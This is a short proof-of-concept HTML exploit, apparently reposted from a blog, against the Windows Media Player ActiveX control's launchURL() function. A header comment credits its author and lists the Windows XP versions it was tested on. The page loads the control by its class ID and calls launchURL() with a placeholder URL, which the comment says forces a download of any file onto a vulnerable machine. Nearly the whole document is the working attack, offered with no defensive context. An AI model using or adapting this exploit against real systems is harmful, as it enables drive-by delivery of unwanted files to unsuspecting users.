<!——-
This is a vulnerability into Windows Media Player ActiveX launchURL() function
which someone can download what ever file into the vulnerable machine !!!
Discovered and written by Jacky!
Tested version: 11.0.5358.4827
Tested machine: Windows XP SP3 & Windows XP SP2
———>
<html>
<body>
<object id=’test’ classid=’clsid:{6BF52A52-394A-11d3-B153-00C04F79FAA6}’></object>
<script>
arg1=’http://<BLAH BLAH BLAH FILE>’;
test.launchURL(arg1);
</script>
</body>
</html>
0 条评论。